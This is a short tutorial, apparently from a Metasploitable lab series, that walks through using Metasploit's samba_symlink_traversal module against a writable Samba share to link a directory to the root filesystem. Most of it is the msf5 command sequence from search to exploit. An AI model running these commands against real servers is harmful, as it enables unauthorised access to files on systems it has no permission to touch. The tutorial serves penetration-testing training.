Attack Samba – This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writable share must be specified. The newly created directory will link to the root filesystem.

Rapid 7

Samba Symlink Directory Traversal

Attack Samba Server

Open Metasploit and search for the module :

Attack Samba
Attack Samba
msf5 auxiliary(admin/smb/samba_symlink_traversal) > search samba_symlink

After find the exploit copy the name run the following command:

msf5()> use admin/smb/samba_symlink_traversal

Now is time to configure the samba exploit parameters like Remote host IP Address and a path to the shared folder to be exploited.

Attack Samba server
msf5 auxiliary(admin/smb/samba_symlink_traversal) > info

To define the Remote Host IP Address use de following command:

msf5 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS

Here we define the shared folder :

msf5 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp

Now let’s launch the exploit against the machine and attack the samba port.

msf5 auxiliary(admin/smb/samba_symlink_traversal) > exploit
Attack Samba server

Attack Unreal IRC Server Port 6667 – Metasploitable